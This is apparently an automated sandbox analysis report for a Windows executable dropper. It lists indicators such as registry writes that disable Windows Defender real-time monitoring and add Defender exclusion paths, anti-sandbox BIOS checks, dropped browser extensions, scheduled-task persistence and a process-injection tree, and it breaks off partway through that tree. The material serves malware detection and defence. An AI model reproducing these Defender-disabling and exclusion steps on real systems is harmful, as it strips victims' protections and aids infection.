Analysis
-
max time kernel
122s -
max time network
129s -
platform
windows7_x64 -
resource
win7-20231023-en -
resource tags
arch:x64arch:x86image:win7-20231023-enlocale:en-usos:windows7-x64system -
submitted
30-10-2023 01:46
Static task
static1
Behavioral task
behavioral1
Sample
992cc3e016d77ca48aa3c41231c003f1e1aae10ebd770fd519f6af1133c2674b.exe
Resource
win7-20231023-en
General
-
Target
992cc3e016d77ca48aa3c41231c003f1e1aae10ebd770fd519f6af1133c2674b.exe
-
Size
7.3MB
-
MD5
704b4f4e101ed35a3735ab0b586859ad
-
SHA1
db554d46b64cfa45e057d9bb355b2ed610c79001
-
SHA256
992cc3e016d77ca48aa3c41231c003f1e1aae10ebd770fd519f6af1133c2674b
-
SHA512
7b8e7291ccb8e2eb7d88d09c906a032956a5ba93a5cc6da744c3425f2534a09d2dd3b69818e58eefc4e2f06768034286e8051d5ccd71fcc6842bb8a45dcb597a
-
SSDEEP
196608:91Oe+bSAdYjIvc4Ch8eyBoSSAVxiNhdQdmv:3OUAS05BnSUIN8dM
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\JiflobLJSPStBDVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wAuKxhFMAdiQGsoHy = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\eogxozCJrYNgvSKM = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\TNrIrJXzU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\UbaivrmHqZUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\TNrIrJXzU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\IUaOUdhiTQgU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\VgjyoxcUurXmC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\JiflobLJSPStBDVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\eogxozCJrYNgvSKM = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\UbaivrmHqZUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\eogxozCJrYNgvSKM = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wAuKxhFMAdiQGsoHy = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\VgjyoxcUurXmC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\IUaOUdhiTQgU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\dACkfQRkXjMlVDtnXZR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\dACkfQRkXjMlVDtnXZR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\eogxozCJrYNgvSKM = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 24 2780 rundll32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Control Panel\International\Geo\Nation jLiBrzq.exe -
Executes dropped EXE 4 IoCs
pid Process 3044 Install.exe 2988 Install.exe 1996 BBaOJSp.exe 2420 jLiBrzq.exe -
Loads dropped DLL 12 IoCs
pid Process 2864 992cc3e016d77ca48aa3c41231c003f1e1aae10ebd770fd519f6af1133c2674b.exe 3044 Install.exe 3044 Install.exe 3044 Install.exe 3044 Install.exe 2988 Install.exe 2988 Install.exe 2988 Install.exe 2780 rundll32.exe 2780 rundll32.exe 2780 rundll32.exe 2780 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json jLiBrzq.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json jLiBrzq.exe -
Drops file in System32 directory 21 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA jLiBrzq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_B67A81AFAE089B928194572649A22563 jLiBrzq.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol BBaOJSp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat jLiBrzq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_90E6705D31DA2761A44BA5F5F40B2AEC jLiBrzq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_B67A81AFAE089B928194572649A22563 jLiBrzq.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini BBaOJSp.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA jLiBrzq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA jLiBrzq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA jLiBrzq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_E83F1CC07F729E027C8598AD1DA25FD6 jLiBrzq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_E83F1CC07F729E027C8598AD1DA25FD6 jLiBrzq.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol jLiBrzq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_90E6705D31DA2761A44BA5F5F40B2AEC jLiBrzq.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol BBaOJSp.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi jLiBrzq.exe File created C:\Program Files (x86)\dACkfQRkXjMlVDtnXZR\hGBMOSy.dll jLiBrzq.exe File created C:\Program Files (x86)\TNrIrJXzU\KAgDUp.dll jLiBrzq.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi jLiBrzq.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak jLiBrzq.exe File created C:\Program Files (x86)\IUaOUdhiTQgU2\IKvAVgVDTUnpm.dll jLiBrzq.exe File created C:\Program Files (x86)\IUaOUdhiTQgU2\SeszmCT.xml jLiBrzq.exe File created C:\Program Files (x86)\dACkfQRkXjMlVDtnXZR\zjfZlzi.xml jLiBrzq.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja jLiBrzq.exe File created C:\Program Files (x86)\TNrIrJXzU\pvyqgvL.xml jLiBrzq.exe File created C:\Program Files (x86)\UbaivrmHqZUn\tKizUCs.dll jLiBrzq.exe File created C:\Program Files (x86)\VgjyoxcUurXmC\IgmhLlB.dll jLiBrzq.exe File created C:\Program Files (x86)\VgjyoxcUurXmC\mIOAVDQ.xml jLiBrzq.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\RkwdBuXRacmpEbY.job schtasks.exe File created C:\Windows\Tasks\aaSAiCeWTOJWAqakW.job schtasks.exe File created C:\Windows\Tasks\bioYAMjDPNiNoqxvcS.job schtasks.exe File created C:\Windows\Tasks\YjdyicABEfUJyYqxF.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1784 schtasks.exe 2960 schtasks.exe 2724 schtasks.exe 1244 schtasks.exe 2564 schtasks.exe 2148 schtasks.exe 2244 schtasks.exe 1036 schtasks.exe 1660 schtasks.exe 2104 schtasks.exe 2816 schtasks.exe 2616 schtasks.exe 920 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing jLiBrzq.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs jLiBrzq.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed jLiBrzq.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs jLiBrzq.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings jLiBrzq.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\fa-c5-43-df-70-ce\WpadDecisionReason = "1" jLiBrzq.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates jLiBrzq.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" jLiBrzq.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0075000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 jLiBrzq.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs jLiBrzq.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed jLiBrzq.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs jLiBrzq.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs jLiBrzq.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs jLiBrzq.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople jLiBrzq.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 jLiBrzq.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\fa-c5-43-df-70-ce\WpadDetectedUrl rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" jLiBrzq.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 jLiBrzq.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\fa-c5-43-df-70-ce jLiBrzq.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs jLiBrzq.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot jLiBrzq.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs jLiBrzq.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates jLiBrzq.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad jLiBrzq.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\fa-c5-43-df-70-ce\WpadDecisionTime = 305a531dd30ada01 jLiBrzq.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs jLiBrzq.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates jLiBrzq.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\fa-c5-43-df-70-ce\WpadDecisionReason = "1" rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\fa-c5-43-df-70-ce\WpadDecisionTime = 305a531dd30ada01 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" jLiBrzq.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{F2B9A436-C2D1-4223-9629-3526A229E203}\WpadDecisionTime = 305a531dd30ada01 jLiBrzq.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{F2B9A436-C2D1-4223-9629-3526A229E203}\WpadNetworkName = "Network 3" jLiBrzq.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0075000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{F2B9A436-C2D1-4223-9629-3526A229E203}\WpadDecisionReason = "1" jLiBrzq.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root jLiBrzq.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates jLiBrzq.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust jLiBrzq.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix jLiBrzq.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings jLiBrzq.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA jLiBrzq.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates jLiBrzq.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs jLiBrzq.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust jLiBrzq.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 jLiBrzq.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{F2B9A436-C2D1-4223-9629-3526A229E203} jLiBrzq.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates jLiBrzq.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs jLiBrzq.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates jLiBrzq.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{F2B9A436-C2D1-4223-9629-3526A229E203}\WpadDecision = "0" jLiBrzq.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{F2B9A436-C2D1-4223-9629-3526A229E203}\fa-c5-43-df-70-ce jLiBrzq.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates jLiBrzq.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe -
Suspicious behavior: EnumeratesProcesses 29 IoCs
pid Process 532 powershell.EXE 532 powershell.EXE 532 powershell.EXE 844 powershell.EXE 844 powershell.EXE 844 powershell.EXE 1788 powershell.EXE 1788 powershell.EXE 1788 powershell.EXE 2268 powershell.EXE 2268 powershell.EXE 2268 powershell.EXE 2420 jLiBrzq.exe 2420 jLiBrzq.exe 2420 jLiBrzq.exe 2420 jLiBrzq.exe 2420 jLiBrzq.exe 2420 jLiBrzq.exe 2420 jLiBrzq.exe 2420 jLiBrzq.exe 2420 jLiBrzq.exe 2420 jLiBrzq.exe 2420 jLiBrzq.exe 2420 jLiBrzq.exe 2420 jLiBrzq.exe 2420 jLiBrzq.exe 2420 jLiBrzq.exe 2420 jLiBrzq.exe 2420 jLiBrzq.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 532 powershell.EXE Token: SeDebugPrivilege 844 powershell.EXE Token: SeDebugPrivilege 1788 powershell.EXE Token: SeDebugPrivilege 2268 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2864 wrote to memory of 3044 2864 992cc3e016d77ca48aa3c41231c003f1e1aae10ebd770fd519f6af1133c2674b.exe 28 PID 2864 wrote to memory of 3044 2864 992cc3e016d77ca48aa3c41231c003f1e1aae10ebd770fd519f6af1133c2674b.exe 28 PID 2864 wrote to memory of 3044 2864 992cc3e016d77ca48aa3c41231c003f1e1aae10ebd770fd519f6af1133c2674b.exe 28 PID 2864 wrote to memory of 3044 2864 992cc3e016d77ca48aa3c41231c003f1e1aae10ebd770fd519f6af1133c2674b.exe 28 PID 2864 wrote to memory of 3044 2864 992cc3e016d77ca48aa3c41231c003f1e1aae10ebd770fd519f6af1133c2674b.exe 28 PID 2864 wrote to memory of 3044 2864 992cc3e016d77ca48aa3c41231c003f1e1aae10ebd770fd519f6af1133c2674b.exe 28 PID 2864 wrote to memory of 3044 2864 992cc3e016d77ca48aa3c41231c003f1e1aae10ebd770fd519f6af1133c2674b.exe 28 PID 3044 wrote to memory of 2988 3044 Install.exe 29 PID 3044 wrote to memory of 2988 3044 Install.exe 29 PID 3044 wrote to memory of 2988 3044 Install.exe 29 PID 3044 wrote to memory of 2988 3044 Install.exe 29 PID 3044 wrote to memory of 2988 3044 Install.exe 29 PID 3044 wrote to memory of 2988 3044 Install.exe 29 PID 3044 wrote to memory of 2988 3044 Install.exe 29 PID 2988 wrote to memory of 2680 2988 Install.exe 31 PID 2988 wrote to memory of 2680 2988 Install.exe 31 PID 2988 wrote to memory of 2680 2988 Install.exe 31 PID 2988 wrote to memory of 2680 2988 Install.exe 31 PID 2988 wrote to memory of 2680 2988 Install.exe 31 PID 2988 wrote to memory of 2680 2988 Install.exe 31 PID 2988 wrote to memory of 2680 2988 Install.exe 31 PID 2988 wrote to memory of 2524 2988 Install.exe 32 PID 2988 wrote to memory of 2524 2988 Install.exe 32 PID 2988 wrote to memory of 2524 2988 Install.exe 32 PID 2988 wrote to memory of 2524 2988 Install.exe 32 PID 2988 wrote to memory of 2524 2988 Install.exe 32 PID 2988 wrote to memory of 2524 2988 Install.exe 32 PID 2988 wrote to memory of 2524 2988 Install.exe 32 PID 2680 wrote to memory of 1672 2680 forfiles.exe 35 PID 2680 wrote to memory of 1672 2680 forfiles.exe 35 PID 2680 wrote to memory of 1672 2680 forfiles.exe 35 PID 2680 wrote to memory of 1672 2680 forfiles.exe 35 PID 2680 wrote to memory of 1672 2680 forfiles.exe 35 PID 2680 wrote to memory of 1672 2680 forfiles.exe 35 PID 2680 wrote to memory of 1672 2680 forfiles.exe 35 PID 2524 wrote to memory of 2660 2524 forfiles.exe 36 PID 2524 wrote to memory of 2660 2524 forfiles.exe 36 PID 2524 wrote to memory of 2660 2524 forfiles.exe 36 PID 2524 wrote to memory of 2660 2524 forfiles.exe 36 PID 2524 wrote to memory of 2660 2524 forfiles.exe 36 PID 2524 wrote to memory of 2660 2524 forfiles.exe 36 PID 2524 wrote to memory of 2660 2524 forfiles.exe 36 PID 1672 wrote to memory of 2544 1672 cmd.exe 37 PID 1672 wrote to memory of 2544 1672 cmd.exe 37 PID 1672 wrote to memory of 2544 1672 cmd.exe 37 PID 1672 wrote to memory of 2544 1672 cmd.exe 37 PID 1672 wrote to memory of 2544 